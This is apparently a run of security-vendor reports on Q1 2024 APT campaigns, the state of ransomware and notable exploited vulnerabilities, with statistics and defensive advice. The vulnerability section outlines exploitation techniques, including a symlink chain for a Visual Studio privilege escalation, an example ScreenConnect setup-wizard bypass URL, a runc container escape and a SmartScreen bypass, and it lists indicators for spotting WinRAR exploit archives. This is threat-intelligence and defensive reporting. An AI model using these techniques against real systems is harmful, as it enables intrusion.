The initial-stage malware serves as a conventional installer designed to introduce supplementary malware and establish a persistence mechanism. Upon execution of the installer, it generates a subsequent stage loader and adds it to the Windows service for automatic execution. The culminating payload in this sequence is previously unknown Golang-based malware dubbed “Durian”. Durian boasts comprehensive backdoor functionality, enabling the execution of delivered commands, additional file downloads and exfiltration of files.

With the help of Durian, the operator implemented various preliminary methods to sustain a connection with the victim. First, they introduced additional malware named “AppleSeed”, an HTTP-based backdoor commonly employed by the Kimsuky group. Furthermore, they incorporated legitimate tools, including ngrok and Chrome Remote Desktop, along with a custom proxy tool, to access target machines. Ultimately, the actor implanted the malware to pilfer browser-stored data including cookies and login credentials.

Based on our telemetry, we pinpointed two victims within the South Korean cryptocurrency sector. The first compromise occurred in August 2023, followed by a second in November 2023. Notably, our investigation did not uncover any additional victims during these instances, indicating a highly focused targeting approach by the actor.

Given that the actor exclusively employed the AppleSeed malware, a tool historically associated with the Kimsuky group, we have a high level of confidence in attributing these attacks to Kimsuky. However, intriguingly, we have detected a tenuous connection with the Andariel group. Andariel, known for adopting a custom proxy tool named “LazyLoad”, appears to share similarities with the actor in this attack, who also utilized LazyLoad, as observed during our research. This nuanced connection warrants further exploration into the potential collaboration or tactics shared between these two threat actors.

ViolentParody is a backdoor detected inside a South Korean gaming company, with the latest deployments observed in January this year. The threat actor distributed this backdoor over the organization’s network by infecting a batch file located on an internal network share. The execution of said infected .BAT file results in the launch of an MSI installer that in turn drops the backdoor on the machine and configures it to persist through scheduled tasks and COM objects. Analysis of this backdoor revealed that couldcollect reconnaissance data on the infected machine, perform file system operations and inject various payloads. We additionally observed the threat actor behind this backdoor launching penetration testing tools, such as Ligolo-ng, Inveigh and Impacket. We attribute the activity described in our report to Winnti with low confidence.

The threat actor SideWinder launched hundreds of attacks in recent months against high-profile entities in Asia and Africa. Most of the attacks start with a spear-phishing email containing a Microsoft Word document or a ZIP archive with an LNK file inside. The attachment kicks off a chain of events that lead to the execution of multiple intermediate stages with different JavaScript and .NET loaders, and finally ends with a malicious implant developed in .NET that runs only in memory.

During the investigation, we observed a rather large infrastructure composed of many different virtual private servers and dozens of subdomains. Many subdomains are assumed to be created for specific victims, and the naming scheme indicated that the attacker had tried to disguise malicious communications as legitimate traffic from websites related to governmental entities or logistics companies.

SideWinder has historically targeted governmental and military entities in South Asia, but in this case, we observed an expanded range of  targets. The actor also compromised victims located in Southeast Asia and Africa. Moreover, we saw different diplomatic entities in Europe, Asia and Africa that were compromised. The expansion in targeting also includes new industries, proven by the discoveries of new targets in the logistics sector, more specifically in maritime logistics.

The Lazarus group has various malware clusters in its arsenal and continues to update its functionalities and techniques to evade detection. However, the actor can also be observed employing its old malware on occasion. We recently discovered that this notorious actor was testing its old and familiar tool, ThreatNeedle. The malware author utilized a binder tool to create initial-stage malware for delivering and implanting the final payload. The main objective of the binder tool is assembling the malware installer, actual payload and configuration. In addition, we discovered various malicious files from an affected machine fetching the next-stage payload after sending the victim’s profile. This kind of downloader malware is typical of Lazarus’s modus operandi. However, the group adopted a more complex HTTP communication format at this time to evade detection at the network level. By investigating the Command-and-Control (C2) resources used by the actor, we discovered NPM packages that contain malicious JavaScript code to deliver malware without user notification. Most of them are disguised as cryptocurrency-related programs and capable of downloading an additional payload from the actor-controlled server. This is a highly similar strategy to the scheme that we have observed and reported in the past.


Hacktivism, a marriage of hacking and activism, is often excluded from a company’s threat profile. This type of threat actor is commonly active in all types of crises, conflicts, wars and protests, among other events. The goal is to send a political, social or ideological message using digital means.

SiegedSec stepped up its hacktivist intrusions and activities internationally throughout 2023. This small group, active since 2022, mainly performs hack-and-leak operations. As with past hacktivist groups like LulzSec, what started as hack-and-leak and disruptive operations “just for lulz”, evolved into multiple offensive efforts in pursuit of social justice-related goals across the globe. The activities also led to coordination with other cybercriminal groups as part of the Five Families hacktivist collective, although SiegedSec were later expelled for alleged improper conduct.

Their recent offensive activity is contingent on current socio-political events. Their web-application-focused offensive activity targets companies and industrial and government infrastructure, and they leak stolen sensitive information. SiegedSec’s social justice initiatives include demanding freedom for an arrested Colombian website defacer / hacker, U.S. state governments’ involvement in instituting anti-abortion laws, the ongoing Israel-Hamas conflict and alleged human rights violations by NATO. The group’s members, both past and present, are still at large.

During the Israel-Hamas conflict, there has been an uptick in activities by hacktivists from all around the world, including denial of service (DoS and DDoS), web defacements, doxing and recycling of old leaks. The targets and victims have been primarily Israeli and Palestinian infrastructure. But since there are supporters on both sides of this conflict, hacktivists also target the infrastructure of supporting countries.

To mitigate exposure to threat actors of this type, it is first important to update the threat/risk profile when similar events happen. Second, it is vital to understand the technology exposure connected to the respective country or institution, and prevent unauthorized access by ensuring secure access and updated software. Third, DoS/DDoS readiness is essential. Although these attacks are transient, merely denying access for a limited time before normal service resumes, the respective tools are widely available, and their disruptive impact on business operation may vary depending on attack duration and size. Therefore, it is essential to implement measures to mitigate against application and volumetric attacks. Finally, data leaks are almost inevitable nowadays. Hackers may merely start with stolen credentials to gain full enterprise access and leak sensitive data. The data may then get recycled in future events, to associate the hot topic of compromise with the hacktivist message, so that it can be heard widely. The best approach to mitigate against this is to prevent the data leak in the first place. Implementing ways to monitor the network flow can be helpful in identifying an unusually large outbound data flow, which could be blocked at an early stage.

Other interesting discoveries

In 2020, we reported an ongoing campaign, started in 2019, that leveraged what was at the time new Android malware named “Spyrtacus”, used against individuals in Italy. The tool exhibited similarities with HelloSpy, the infamous stalkerware used to remotely monitor infected devices. The threat actor first started distributing the malicious APK via Google Play in 2018, but switched to malicious web pages forged to imitate legitimate resources relating to the most common Italian internet service providers in 2019. We have continued to monitor this threat over the years and recently observed a previously unknown Spyrtacus agent developed for Windows. The implant communicates with a C2 resource already reported in one of our previous reports and shares similarities to the Android counterpart in both malware logic and the communication protocol. During the investigation, we discovered other subdomains, which indicate the existence of implants for iOS and macOS, and may indicate the expansion of the group’s activities to other countries in Europe, Africa and the Middle East.

Final thoughts

While the TTPs of some threat actors remain consistent over time, such as heavy reliance on social engineering as a means of gaining a foothold in a target organization or compromising an individual’s device, others have refreshed their toolsets and expanded the scope of their activities. Our regular quarterly reviews are intended to highlight the most significant developments relating to APT groups.

Here are the main trends that we saw in Q1 2024:

  • The key highlights this quarter include Kimsuky’s use of the Golang-based backdoor Durian in a supply-chain attack in South Korea, and campaigns focused on the Middle East, including APTs such as Gelsemium, but also hacktivist attacks.
  • The Spyrtacus malware used for targeting individuals in Italy demonstrates that threat actors continue to develop for multiple platforms, including mobile malware.
  • APT campaigns continue to be very geographically dispersed. This quarter, we reported campaigns focused on Europe, the Americas, the Middle East, Asia and Africa.
  • We have seen attacks targeting a variety of sectors, including government, diplomatic, gaming, maritime logistics and an ISP.
  • Geopolitics remains a key driver of APT development, and cyberespionage remains a prime goal of APT campaigns.
  • We also continue to see hacktivist campaigns: these have been centered mainly around the Israel-Hamas conflict, but not exclusively, as the activities of SiegedSec illustrate.

As always, we would like to note that our reports are the product of our visibility into the threat landscape. However, it should be borne in mind that, while we strive to continually improve, there is always the possibility that other sophisticated attacks may fly under our radar.

Disclaimer: when referring to APT groups as Russian-speaking, Chinese-speaking or other-language-speaking, we refer to various artefacts used by the groups (such as malware debugging strings, comments found in scripts, etc.) containing words in these languages, based on the information that we obtained directly or that is otherwise publicly known and widely reported. The use of certain languages does not necessarily indicate a specific geographic relation, but rather points to the languages that the developers behind these APT artefacts use.

State of ransomware in 2024

8 Květen, 2024 - 12:00

Ransomware attacks continue to be one of the biggest contemporary cybersecurity threats, affecting organizations and individuals alike on a global scale. From high-profile breaches in healthcare and industrial sectors – compromising huge volumes of sensitive data or halting production entirely – to attacks on small businesses that have become relatively easy targets, ransomware actors are expanding their sphere of influence. As we approach International Anti-Ransomware Day, we have analyzed the major ransomware events and trends. In this report, we share our observations, research, and statistics to shed light on the evolving ransomware threat landscape and its implications for cybersecurity.

Ransomware landscape: rise in targeted groups and attacks

Kaspersky collected data on targeted ransomware groups and their attacks from multiple relevant public sources, for the years 2022 and 2023, filtered and validated it. The research reveals a 30% global increase in the number of targeted ransomware groups compared to 2022, with the number of known victims of their attacks rising by a staggering 71%.

Unlike random attacks, these targeted groups focus on governments, high-profile organizations, or specific individuals within an organization. Moreover, most of them distribute their malware under the Ransomware-as-a-Service (RaaS) model, which involves a number of smaller groups (called affiliates) getting access to the ransomware for a subscription fee or a portion of the ransom. In the graph below, you can see the ransomware families that were most active in 2023.

Most active ransomware families by number of victims, 2023

The ransomware most frequently encountered in organizations’ systems in 2023 was Lockbit 3.0. The reason for its remarkable activity may be its builder leak in 2022. That led to various independent groups using the builder to create custom ransomware variants, which they then used to target organizations all over the world. The group itself also has a large affiliate network. Second was BlackCat/ALPHV, which first appeared in December 2021. In December 2023, the FBI, together with other law enforcement agencies, disrupted BlackCat’s operations and seized several websites of the group. However, immediately after the operation, BlackCat stated that it had “unseized” at least some of the sites. The US Department of State offers a 10 million bounty for the group’s associates. The third most active ransomware in 2023 was Cl0p. This group managed to breach managed the file transfer system MoveIt to get to its customers’ data. According to New Zealand security firm Emsisoft, as of December 2023, this breach had affected over 2500 organizations.

Other notable ransomware variants

In our threat research practice, among the threats we analyze are various ransomware samples. This section shares brief descriptions of several noteworthy families that, although not being the most active in 2023, are interesting in some way or another.

  • BlackHunt: Detected in late 2022 and updated in 2023, BlackHunt targets global victims using a C++ executable, which is based on Conti ransomware source code. It utilizes customizable attack vectors, including deceptive tactics like a fake Windows Update screen displayed to mask the file encryption process, and employs security measures for testing purposes, such as checking for “Vaccine.txt” before executing. If the malware author wants to test the executable without encrypting their own files, they create a Vaccine.txt file. If the malware finds this file in the system, it doesn’t proceed with encryption.
  • Rhysida: Emerging in May 2023, Rhysida is a new RaaS operation initially targeting Windows but later expanding to Linux. Both versions use AES and RSA algorithms for file encryption, and the ChaCha stream cipher in the key generation process. The ransomware also implements token-based access to its hidden service for enhanced secrecy.
  • Akira: A compact C++ ransomware compatible with both Windows and Linux, Akira has impacted over 60 organizations across various sectors. It employs a single key for encryption, and featured an encryption flaw in early versions, which made file decryption possible without the ransomware operators’ knowledge. However, this flaw was fixed in recent variants, which are not decryptable at the time of writing this report. For victim communication, Akira utilizes a minimalistic JQuery Terminal-based hidden service.
  • Mallox: Also known as Fargo and TargetCompany, Mallox has been wreaking havoc since its appearance in May 2021. With an increase in attacks in 2023 and nearly 500 identified samples, it continues to evolve with frequent updates and an active affiliate program as of 2024. Operating through both clearnet and TOR servers, Mallox targets internet-facing MS SQL and PostgreSQL servers and spreads through malicious attachments. The most affected countries include Brazil, Vietnam, China, Saudi Arabia, and India.
  • 3AM: A new RaaS variant, 3AM features a sophisticated command-line interface, and an “access key” feature for protection against automatic sandbox execution: to be executed, the ransomware requires an access key. As is the case with most human-operated ransomware, 3AM affiliates get an initial foothold in the target infrastructure using Cobalt Strike. In Cobalt Strike, they use the watermark option, which allows the attackers to uniquely identify beacon traffic associated with a specific Cobalt Strike team server. This may suggest that 3AM affiliates share access to the target with other ransomware groups, and use the watermark to separate their traffic from the others. The ransomware employs efficient file-processing techniques, such as reverse traversal (processing strings from the end to quickly identify file paths and extensions) and integration with Windows API, and terminates various processes before encryption to complicate recovery efforts. Communication with victims is through a TOR-based hidden service, though with operational security misconfigurations such as real IP exposure.
Trends observed in our incident response practice

This section contains trends and statistics based on the incidents our incident response service dealt with in 2023. The figures in this section may differ from those obtained from public sources, because they don’t cover all ransomware-related incidents that occurred last year.

According to our incident response team, in 2023, every third incident (33.3%) was related to ransomware, which remained the primary threat to all organizations, whatever sector of economy or industry they belonged to.

Another important trend observed in 2023: attacks via contractors and service providers, including IT services, became one of the top three attack vectors for the first time. This approach facilitates large-scale attacks with less effort, often going undetected until data leaks or encrypted data are discovered. If speaking about ransomware, trusted relationship attacks were among four of the main initial infection vectors. Another three were: compromise of internet-facing applications, which accounted for 50% of all ransomware attacks; compromised credentials (40%), of which 15% were obtained as a result of brute force attacks; and phishing.

Among the ransomware families most frequently encountered in our incident response practice in 2023 were Lockbit (27.78%), BlackCat (12.96%), Phobos (9.26%), and Zeppelin (9.26%). Most of the data encryption attacks ended within a day (43.48%) or days (32.61%). The rest lasted for weeks (13.04%), while only 10.87% lasted for more than a month. Practically all the long ransomware attacks (those lasting weeks and months), in addition to data encryption, also featured data leakage.

Ransomware groups’ tactics and techniques

Ransomware groups have continued to employ previously identified strategies for intrusion, utilizing similar tools and techniques. Adversaries have targeted internet-facing applications vulnerable to remote command execution (RCE), such as those supported by vulnerable versions of log4j. Exploiting vulnerabilities in these applications, adversaries have gained unauthorized access and compromised infrastructures.

Once exploitation is confirmed, adversaries typically proceed by manipulating local privileged accounts responsible for application execution. They execute commands to modify user passwords and upload a set of tools, such as Meterpreter and Mimikatz, to the compromised system. By executing Meterpreter and creating or modifying system processes, adversaries gain additional access and establish persistence on the compromised system.

In some instances, adversaries exploit vulnerabilities in public-facing applications within the organization’s infrastructure and utilize tools like BloodHound and Impacket for lateral movement within networks and gaining knowledge of the target infrastructure. However, to evade endpoint controls, they also have adopted different techniques, such as using the Windows Command Shell to collect event logs and extract valid usernames.

Additionally, adversaries leverage native Windows SSH commands for command and control (C2) communications and data exfiltration. After identifying paths to reach remote systems with internet access, they configure SSH backdoors and establish reverse tunneling for data exchange.

Overall, ransomware groups demonstrate a sophisticated understanding of network vulnerabilities and utilize a variety of tools and techniques to achieve their objectives. The use of well-known security tools, exploitation of vulnerabilities in public-facing applications, and the use of native Windows commands highlight the need for robust cybersecurity measures to defend against ransomware attacks and domain takeovers.

Ransomware: becoming a matter of national and international security

Over the past few years, the impact of ransomware attacks on public and private organizations has escalated to the point of threatening national security. This growing threat has led to ransomware being highlighted in national cybersecurity strategies, annual reports from cybersecurity regulators, and intergovernmental discussions at forums like the UN Open-ended Working Group (OEWG) on cybersecurity. The frequency and disruptive character of ransomware attacks has become unsustainable for governments, prompting them to pool resources and develop both national and multi-country initiatives to combat ransomware groups.

One notable initiative is the formation in 2021 of the international Counter Ransomware Initiative (CRI), which brings together 49 countries and INTERPOL. Through the CRI, there has been a concerted effort to share cybersecurity information, disrupt attackers’ operations, and tackle the financial mechanisms that fuel ransomware attacks. CRI members have also endorsed a statement advocating against ransom payments by institutions under national government authority, signaling the need for a new global norm and standard around ransomware payments. Countries like Singapore and the United Kingdom have played pivotal roles within the CRI, focusing on understanding the ransomware payment ecosystem and advocating for policies that counter ransomware financing.

Legislative measures and policy actions are central to the fight against ransomware. In the United States, legislation like the Cyber Incident Reporting for Critical Infrastructure Act of 2022 aims to enhance incident reporting and resilience against attacks. In early 2023, France implemented a law that conditioned insurance coverage on the prompt reporting of cybersecurity incidents.

State agencies reporting on ransomware indicates that fighting against this threat is a priority for authorities. In its latest IT Security Report 2023, the BSI (Germany) identifies ransomware as the biggest cybersecurity threat to Germany, noting the shift from “big game hunting” to targeting smaller companies and municipal administrations.

Last but not least, law enforcement agencies around the globe are joining forces in operations aimed at dismantling ransomware networks. In 2023, international operations seized infrastructures of such ransomware groups as Hive, BlackCat, and Ragnar. Early 2024 saw Operation Cronos disrupt Lockbit and get access to their decryption keys, and in May 2024, the group’s leader was unmasked and sanctioned. Although cybercriminals usually rebuild their infrastructure afterwards, these efforts at the very least make ransomware maintenance much more expensive and shorten their income by decrypting their victims for free. These and other efforts underscore a comprehensive approach to fighting ransomware. By combining international cooperation, legislative action, and financial oversight, countries aim to mitigate the global threat and impact of ransomware attacks effectively.

Ransomware – what to expect in 2024

As we look ahead to 2024, we observe a significant shift in the ransomware ecosystem. While many prominent ransomware gangs have disappeared, smaller and more elusive groups are emerging. This rise can be attributed to leaked source code and tools from disbanded or deceased larger groups.

As officials discuss counter-ransomware measures and law authorities around the globe link up to combat cybercrime, ransomware operations are becoming increasingly fragmented. Larger, more coordinated groups are breaking down into smaller fractions, making it more challenging for law enforcement to target them. Moreover, each of these smaller groups has less impact and is of less interest for law enforcement, thus having a reduced likelihood of being tracked and prosecuted, giving independent ransomware actors a higher chance of escaping arrest.

In conclusion, ransomware attacks remain a significant and evolving threat in the realm of cybersecurity. From high-profile breaches affecting critical sectors to attacks on small businesses, the impact of ransomware continues to expand. As we reflect on the state of ransomware, several key observations and trends emerge.

To mitigate the risk of ransomware attacks, individuals and organizations should prioritize cybersecurity measures.

  • Use robust, properly-configured security solutions like Kaspersky NEXT.
  • Implement Managed Detection and Response (MDR) to proactively seek out threats.
  • Disable unused services and ports to minimize the attack surface.
  • Keep all systems and software up to date with regular updates and patches.
  • Conduct regular penetration tests and vulnerability scanning to identify and address vulnerabilities promptly.
  • Provide comprehensive cybersecurity training to employees to raise awareness of cyberthreats and best practices for mitigation.
  • Establish and maintain regular backups of critical data, and test backup and recovery procedures regularly.
  • Use Threat Intelligence to keep track of the latest TTPs used by groups and adjust your detection mechanisms to catch these.
  • Pay special attention to any “new” software being run and installed on systems within your network (including legitimate software).

Exploits and vulnerabilities in Q1 2024

7 Květen, 2024 - 12:00

We at Kaspersky continuously monitor the evolving cyberthreat landscape to ensure we respond promptly to emerging threats, equipping our products with detection logic and technology. Software vulnerabilities that threat actors can exploit or are already actively exploiting are a critical component of that landscape. In this report, we present a series of insightful statistical and analytical snapshots relating to the trends in the emergence of new vulnerabilities and exploits, as well as the most prevalent vulnerabilities being used by attackers. Additionally, we take a close look at several noteworthy vulnerabilities discovered in Q1 2024.

Statistics on registered vulnerabilities

To facilitate the management of vulnerabilities, vendors can register these and assign CVE identifiers. All identifiers and related public information are published on https://cve.mitre.org (at the time of writing, the site is in the process of migrating to a new domain, https://www.cve.org/). Although vendors often fail to register vulnerabilities, and the CVE list cannot be considered exhaustive, it does allow us to track certain trends. We analyzed data on registered software vulnerabilities and compared their quantities over the past five years.

The number of newly registered CVEs, 2019 — 2024. The decline in 2024 is due to data being available for Q1 only (download)

As the chart illustrates, the number of new vulnerabilities has been steadily increasing year over year. This can be attributed to several factors.

Firstly, the growing popularity of bug bounty platforms and vulnerability discovery competitions have provided a major impetus to research in the field. As a result, vulnerability discoveries have been on the rise. This also leads to more vendors registering the discovered vulnerabilities, resulting in a growing number of CVEs.

Secondly, companies developing popular software, operating systems, and programming languages are implementing more security solutions and new procedures that improve the performance of vulnerability monitoring in software. On the one hand, this leads to vulnerabilities being discovered more frequently; on the other, entire categories of vulnerabilities become obsolete. As a result, both threat actors and security researchers striving to stay ahead are actively searching for new types of vulnerabilities and creating automated services that allow for even more efficient detection.

Finally, new applications appear with time as existing ones get updates and become more complex, spawning new vulnerabilities. With the rapid pace of technological evolution, the number of discovered vulnerabilities is likely to continue to grow year after year.

It is important to note that different vulnerabilities pose different levels of security threats. In particular, some of them may be categorized as critical. We used the data in the list of registered CVEs and the results of internal reproducibility tests to calculate the share of critical vulnerabilities.

The number of newly registered CVEs and the percentage of critical CVEs in these, 2019 — 2024. The decline in 2024 is due to data being available for Q1 only (download)

As the chart shows, the growth in the number of critical vulnerabilities has been intermittent. In 2021 and 2022, the share of critical vulnerabilities among the total number was comparable, but it increased during the periods from 2019 through 2021 and from 2022 through 2023. The year 2023 was notable for a record number of critical vulnerabilities discovered in software. The percentage of critical vulnerabilities in the total number of registered ones remained high in Q1 2024. This once again emphasizes the importance of proper patch management and the need for security solutions capable of preventing vulnerability exploitation.

Exploitation statistics

This section presents exploit statistics gathered from both public sources, such as registered CVEs, and our in-house telemetry.

An exploit is a program containing data or executable code that takes advantage of one or more software vulnerabilities on a local or remote computer for malicious purposes. Software vulnerabilities that allow attackers to gain control over the target user’s system are of the highest value to exploit developers.

Exploits can be created by malicious actors who sell their creations on underground forums or use them to their own ends. Additionally, enthusiasts, including participants of various bug bounty programs, develop exploits to stay ahead of adversaries and devise countermeasures.

A dark web buy ad for zero- and one-day exploits

Windows and Linux vulnerability exploitation

The charts below show the trends in the number of Linux and Windows users protected by Kaspersky products who encountered vulnerability exploits in 2023 and Q1 2024. The statistics are based on data from the Kaspersky Security Network, provided by our users voluntarily.

Changes in the number of Windows users who encountered exploits, Q1 2023 — Q1 2024. The number of users who encountered exploits in Q1 2023 is taken as 100% (download)

Changes in the number of Linux users who encountered exploits, Q1 2023 — Q1 2024. The number of users who encountered exploits in Q1 2023 is taken as 100% (download)

As the charts demonstrate, the number of Windows users who experienced vulnerability exploitation remained roughly unchanged throughout 2023, whereas the number of affected Linux users increased steadily. It’s important to note that this doesn’t necessarily involve the same vulnerabilities in both cases. Some vulnerabilities quickly become obsolete, prompting threat actors to shift their focus to newer ones.

Let’s illustrate the changes in the popularity of certain vulnerabilities using the example of the CVE-2023-38831 vulnerability in WinRAR.

The popularity dynamics of the CVE-2023-38831 vulnerability in WinRAR, September 2023 — March 2024 (download)

The chart reveals that the vulnerability was quite popular almost immediately after it was registered in September 2023 but then gradually declined in relevance as users installed patches. This is just further evidence that malicious actors tend to take an interest in vulnerabilities as long as the number of users who have installed a fix is relatively small.

Public exploit statistics

The availability of an exploit, especially when accessible on public platforms like GitHub, is a key criterion in assessing the criticality of a vulnerability. We analyzed data on publicly available exploits for registered vulnerabilities.

The number of vulnerabilities and the percentage of those that have an exploit, 2019 — 2024 (download)

The statistics reveal an increase in the total number of exploits, encompassing both ready for use and raw PoCs. The latter may be unstable but they demonstrate the possibility of exploiting the vulnerability and hold potential for future refinement. It’s worth noting that malicious actors seek both new exploits and modifications to existing ones, such as optimization for compatibility with multiple operating systems, integration of new data processing methods, and stability enhancements.

A dark web ad seeking an exploit for the CVE-2023-40477 vulnerability in WinRAR

A dark web ad seeking assistance in configuring a CVE-2023-28252 exploit for older Windows versions

Most prevalent exploits

We continuously monitor exploits published for various vulnerabilities, with a particular focus on critical ones. Our analysis of these exploits has allowed us to single out several categories of software that are of particular interest to malicious actors:

  • Browsers;
  • Operating systems (Windows, Linux, macOS);
  • Microsoft Exchange servers and server components;
  • Microsoft SharePoint servers and server components;
  • The Microsoft Office suite;
  • All other applications that fall outside the five categories above.

Let’s see which software categories had the most critical vulnerabilities with working exploits in 2023 and Q1 2024.

The distribution of exploits for critical vulnerabilities by platform, 2023 (download)

The distribution of exploits for critical vulnerabilities by platform, Q1 2024 (download)

The data indicates that the software categories most affected by critical vulnerabilities with working exploits are:

  • Operating systems;
  • Browsers.

However, in Q1 2024, we also observed a significant number of exploits targeting Exchange servers. Additionally, a substantial portion of exploits falls into the “other software” category. This is due to the variety of applications that users may have installed on their systems to handle business tasks.

Vulnerability exploitation in APT attacks

Exploiting software vulnerabilities is an integral component of nearly every APT attack targeting enterprise infrastructures. We analyzed available data on exploits used in APT attacks for 2023 and Q1 2024 to determine which software is most frequently exploited by attackers. Below are the vulnerabilities that APT groups leveraged the most in 2023 and Q1 2024.

The top 10 vulnerabilities exploited in APT attacks, 2023

The top 10 vulnerabilities exploited in APT attacks, Q1 2024

The statistics presented above indicate that popular entry points for malicious actors currently are:

  • Vulnerable remote access services like Ivanti or ScreenConnect.
  • Vulnerable access control features like Windows SmartScreen.
  • Vulnerable office applications. Notably, exploits for the Microsoft Office suite, which long held the top of the most-exploited list, were superseded by a WinRAR vulnerability in 2023.

Therefore, we can conclude that APT groups mostly exploit vulnerabilities while gaining initial access to an infrastructure. In most cases, this involves either breaching the perimeter (for example, by exploiting vulnerable internet-facing services like VPNs and web applications) or exploiting office applications combined with social engineering (for example, by emailing infected documents or archives to company employees).

Notable Q1 2024 vulnerabilities

This section deals with the most interesting vulnerabilities registered in Q1 2024.

CVE-2024-3094 (XZ)

A backdoor was discovered within the XZ data compression utility package in late March. Attackers inserted malicious code into the source code of the library responsible for handling archived data. This code, through a modified build procedure, ended up in the compiled library. Upon loading such a library, the malicious code would begin modifying functions in memory that are exported by certain distributions for SSH server operation, enabling the attackers to send commands to the infected server.

The backdoor’s functionality is notable because the attackers managed to inject malicious algorithms into a popular library, a feat rarely accomplished in the history of open-source software. The attack also stands out for its complexity and the multi-stage infection process. No one but the author of the malicious code could have exploited the backdoor.

CVE-2024-20656 (Visual Studio)

This vulnerability in Visual Studio lets a malicious actor elevate their privileges in the system. An attacker can leverage it to execute a DACL reset attack on Windows. A DACL (Discretionary Access Control List) is an access control list that defines the level of access users have to perform specific operations on an object. Resetting a DACL removes all restrictions on accessing system files or directories, so any users can do whatever they wish to these. The vulnerability is intriguing due to its exploitation algorithm.

The exploit source code, which we analyzed, utilizes a method of redirecting the Visual Studio application debugging service from one directory to another through a symlink chain: DummyDir => Global\\GLOBALROOT\\RPC Control => TargetDir. Here, DummyDir is a publicly accessible directory created by the attacker, and TargetDir is the directory they want to gain access to. When the application debugging service is redirected from DummyDir to TargetDir, the latter inherits access settings identical to those of DummyDir.

This method of employing symlinks to perform selective actions on protected files is quite challenging to prevent, as not all files within a system can be write-protected. This implies that it could potentially be used to exploit other vulnerabilities in the future. If a file or dependency used by the targeted OS service is identified and its modification restrictions are removed, the user can simply overwrite this file or dependency after the exploit runs. Upon the next launch, the attacker-injected code will execute within the compromised service, inheriting the same access level as the service itself.

We are not currently aware of any cases of this vulnerability being leveraged in real-life attacks. However, it shares the same exploitation primitives with the CVE-2023-36874, which malicious actors began exploiting even before it was discovered.

CVE-2024-21626 (runc)

OS-level virtualization, or containerization, is widely employed today for application scaling and building fault-tolerant systems. Therefore, vulnerabilities within systems that manage containers are of critical importance.

The vulnerability in question owes its existence to certain behavior of the fork system call in the Linux kernel. This system call’s characteristic feature is the method by which it launches a child process, which is copied from the parent process.

This functionality allows for rapid application startup but also presents a risk that developers may not always consider. Process cloning implies that some data from the parent process may be accessible from the child process. If the application code fails to monitor such data, this can lead to a data disclosure vulnerability CWE-403 – Exposure of File Descriptor to Unintended Control Sphere, according to the CWE category system.

CVE-2024-21626 is a case in point. The Docker toolkit uses the runc tool to create and run containers; therefore, a running container acts as a child process relative to runc. If you try accessing /proc/self directory from that container, you can obtain descriptors for all files opened by the runc process. Navigation of accessible resources and descriptors in Linux follows file system rules. Hence, attackers quickly started using the relative path to interpreters accessible to the parent process to escape the container.

You can detect exploitation of this vulnerability by monitoring activity within a running container. The primary pattern observed during exploitation involves the container attempting to access the file system using the path:


CVE-2024-1708 (ScreenConnect)

ConnectWise ScreenConnect is a remote desktop access tool. It comprises client-side applications running on user systems and a server used for client management. The server hosts a web application that contains the vulnerability in question.

Access control is considered to be the most critical mechanism within web applications. It works only as long as every user-accessible function and parameter in the web application is monitored and validated before being used in the application’s algorithms. The request monitoring and control in ScreenConnect proved to be inadequate. An attacker could force the system to reset its settings by simply appending a “/” character to the original request URL like this: http://vuln.server/SetupWizard.aspx. As a result, the adversary could gain access to the system with administrator privileges and exploit the server for malicious purposes.

The vulnerability is being actively used by malicious actors. Therefore, we recommend that ScreenConnect users apply the patch released by the developers and configure firewall rules to restrict access to the server’s web interface.

CVE-2024-21412 (Windows Defender)

The primary objective of most attacks targeting user systems is the execution of malicious commands. Attackers aim to accomplish this task through various methods, but the most popular and reliable approach involves launching a malicious file. To minimize the risk of unauthorized application launches, Windows employs a mechanism known as the SmartScreen Filter. SmartScreen checks websites that the user visits and files downloaded from the internet. When the check starts, the user sees a lock screen.

Such a notification can prompt the user to reconsider whether they truly want to launch the application. Consequently, malicious actors are actively seeking ways to bypass this filter. CVE-2024-21412 represents one such method.

Deceiving the security mechanism relies on a simple principle: if SmartScreen checks files downloaded from the internet, just trick the filter into believing that the file was already in the system at the time of launch.

This can be achieved by interacting with a file stored in a network storage. In the vulnerability in question, the storage resides on a WebDAV server. The WebDAV protocol allows multiple users to simultaneously edit a file stored on the server, and Windows provides capabilities for automatic access to such storage. All that remains for attackers is to present the server to the system in the appropriate manner. For this purpose, they use the following file URL:


CVE-2024-27198 (TeamCity)

This vulnerability in the web interface of the TeamCity continuous integration tool allows access to features that should be restricted to authenticated users. You can detect exploitation by analyzing the standard logs that TeamCity generates in its working directory. The malicious pattern appears as follows:

The improper handling of files with a blank name, as shown above, grants unauthorized attackers access to the server API.

Malicious actors leverage this vulnerability as a way of gaining initial access to targeted systems. For more efficient exploitation monitoring, we recommend auditing accounts with access to the web interface.

CVE-2023-38831 (WinRAR)

Although this vulnerability was discovered in 2023, we believe it warrants attention due to its popularity among malicious actors in both late 2023 and Q1 2024.

This is how it works: when attempting to open a file inside an archive using the WinRAR GUI, the application also opens the contents of a folder with the same name if such a folder exists in the archive.

Since attackers began exploiting the vulnerability, they have come up with several types of exploits that can have one of two formats:

  • ZIP archives;
  • RAR archives.

The variations in malware and existing archives make it impossible to determine definitively whether an archive is an exploit. However, we can identify key characteristics of an exploit:

  • The archive contains files whose names match those of subdirectories.
  • At least one file name contains a space before the extension.
  • The archive must contain an executable located inside the subdirectory.

Here are examples of such files viewed in a hex editor. For a ZIP archive, the data looks like this:

For RAR files, like this:

Attackers have learned to conceal exploit artifacts by protecting the archive with a password. In such cases, file paths may be encrypted, so the only way to detect an exploit would be through behavior analysis.

Conclusions and advice

In recent times, we have observed a continuous year-over-year increase in the number of registered vulnerabilities, accompanied by a rise in the availability of public exploits. Vulnerability exploitation is a crucial component of targeted attacks, with malicious actors typically focused on leveraging vulnerabilities extensively within the first few weeks following their registration and exploit publication. To stay safe, it is essential to respond promptly to the evolving threat landscape. Also, make sure that you:

  • Maintain a comprehensive understanding of your infrastructure and its assets, paying particular attention to the perimeter. Knowledge of your own infrastructure is a fundamental factor in establishing any security processes.
  • Implement a robust patch management system to promptly identify vulnerable software within your infrastructure and deploy security patches. Our Vulnerability Assessment and Patch Management and Kaspersky Vulnerability Data Feed solutions can assist you in this endeavor.
  • Use comprehensive security solutions that enable you to build a flexible and efficient security system. This system should encompass robust endpoint protection, early detection and suppression of attacks regardless of their complexity, access to up-to-date data on global cyberattacks, and basic digital literacy training for your We recommend our Kaspersky NEXT suite of products for business protection as a solution that can be tailored to the needs and capabilities of any company size.

Financial cyberthreats in 2023

6 Květen, 2024 - 12:00

